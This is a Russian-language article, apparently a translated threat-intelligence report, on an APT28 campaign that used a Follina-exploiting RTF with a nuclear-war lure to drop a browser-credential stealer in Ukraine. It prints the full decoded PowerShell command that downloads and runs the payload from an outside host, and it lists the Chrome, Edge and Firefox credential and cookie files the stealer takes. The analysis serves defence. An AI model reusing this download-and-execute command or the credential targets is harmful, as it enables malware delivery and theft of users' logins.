Российская APT28 использует страх ядерной войны для распространения Follina docs в Украине Актуальное 

Российская APT28 использует страх ядерной войны для распространения Follina docs в Украине

, , , , , , , , ,

В недавней кампании APT28, передовая постоянная угроза, связанная с российской разведкой, нацелилась на Украину, нацелив на пользователей вредоносное ПО, которое крадет учетные данные, хранящиеся в браузерах.

APT28 (также известная как Sofacy и Fancy Bear) — печально известная российская угроза для недружественных странд, действующая как минимум с 2004 года, основной деятельностью которой является сбор разведданных для российского правительства. Известно, что эта группа нацелена на американских политиков и американские организации, включая ядерные объекты США.

20 июня 2022 года Malwarebytes Threat Intelligence обнаружила документ, который был вооружен эксплойтом Follina (CVE-2022-30190) для загрузки и запуска нового .Net stealer, о котором впервые сообщила Google. Открытие также было сделано независимо компанией CERT-UA.

Follina — это недавно обнаруженный эксплойт нулевого дня, который использует ms-msdtпротокол для загрузки вредоносного кода из документов Word при их открытии. Это первый раз, когда мы наблюдали, как APT28 использует Follina в своих операциях.

Вредоносный документ

Имя файла maldoc, Nuclear Terrorism A Very Real Threat.rtf, пытается заставить жертв открыть его, наживаясь на их страхах, что Спецоперация в Украине перерастет в ядерный конфликт.

Содержание документа — статья Атлантического совета под названием “Будет ли Путин использовать ядерное оружие в Украине? Наши эксперты отвечают на три животрепещущих вопроса”, опубликованный 10 мая этого года.


Приманка спрашивает: “Будет ли Путин использовать ядерное оружие в Украине?”

Maldoc — это RTF-файл, скомпилированный 10 июня, что позволяет предположить, что атака была использована примерно в то же время. Он использует удаленный шаблон, встроенный в Document.xml.relsфайл, для извлечения удаленного HTML-файла из URL http://kitten-268.frge.io/article.html.

HTML-файл использует вызов JavaScript для window.location.hrefзагрузки и выполнения закодированного сценария PowerShell с использованием ms-msdtсхемы URI MSProtocol. Расшифрованный скрипт используется cmdдля запуска кода PowerShell, который загружает и выполняет конечную полезную нагрузку:

"C:\WINDOWS\system32\cmd.exe" /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command "& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}"

Анализ полезной нагрузки

Конечная полезная нагрузка — это вариант похитителя, который APT28 ранее использовал против целей в Украине. В самом старом варианте похититель использовал поддельное сообщение об ошибке, чтобы скрыть, что он делает (вторичный поток отображал это сообщение об ошибке, в то время как основная программа продолжала выполняться). Новый вариант не показывает всплывающее окно.

В более старых версиях the stealer поддельное сообщение об ошибке отвлекало пользователей

Вариант, используемый в этой атаке, почти идентичен тому, о котором сообщает Google, с несколькими незначительными рефакторингами и некоторыми дополнительными командами сна.

Google Chrome и Microsoft Edge

Вредоносная программа крадет любые учетные данные веб-сайта (имя пользователя, пароль и URL), которые пользователи сохранили в браузере, прочитав содержимое %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data.

Сеанс отладки, показывающий, как злоумышленники могут украсть учетные данные

Очень похожим образом новый вариант также захватывает все сохраненные файлы cookie, хранящиеся в Google Chrome, путем доступа %LOCALAPPDATA%\Google\Chrome\User Data\Default\Network\Cookies.

Код кражи файлов cookie (Google Chrome)

Украденные файлы cookie иногда могут быть использованы для взлома веб-сайтов, даже если имя пользователя и пароль не сохранены в браузере.

Код для кражи файлов cookie и паролей из браузера Edge на базе Chromium практически идентичен коду, используемому для Chrome.

Firefox

Эта вредоносная программа также может красть данные из Firefox. Он делает это, просматривая каждый профиль в поисках cookies.sqliteфайла, в котором хранятся файлы cookie для каждого пользователя.


Sysmon захватывает доступ к файлу cookies.sqlite

В случае паролей злоумышленники пытаются украсть logins.jsonkey3.dbkey4.dbcert8.dbcert9.dbsignons.sqlite.

Злоумышленники также захватят пароли из Firefox

Эти файлы необходимы для восстановления таких элементов, как сохраненные пароли и сертификаты. Старые версии также поддерживаются (signons.sqlitekey3.dbи cert8.dbбольше не используются новыми версиями Firefox). Обратите внимание, что если пользователь установил мастер-пароль, злоумышленники, скорее всего, позже попытаются взломать этот пароль в автономном режиме, чтобы восстановить эти учетные данные.

Эксфильтрация данных

Вредоносная программа использует протокол электронной почты IMAP для передачи данных на свой сервер управления и контроля (C2).
Событие входа в систему по протоколу IMAP

Старый вариант этого похитителя, связанный с почтой [.]sartoc.com (144.208.77.68) для извлечения данных. Новый вариант использует тот же метод, но в другом домене, www.specialityllc [.]ком. Интересно, что оба находятся в Дубае.

Вполне вероятно, что владельцы сайтов C2 не имеют никакого отношения к APT28, и группа просто воспользовалась заброшенными или уязвимыми сайтами.

Хотя взлом браузеров может выглядеть как мелкая кража, пароли являются ключом к доступу к конфиденциальной информации и разведданным. Цель и участие APT28, подразделения Российской военной разведки), предполагает, что кампания является частью Спецоперации в Украине или, по крайней мере, связана с внешнеполитическими и военными целями Российского государства. Украина продолжает оставаться полем битвы для кибератак и шпионажа.

Автор — Шахулов Никита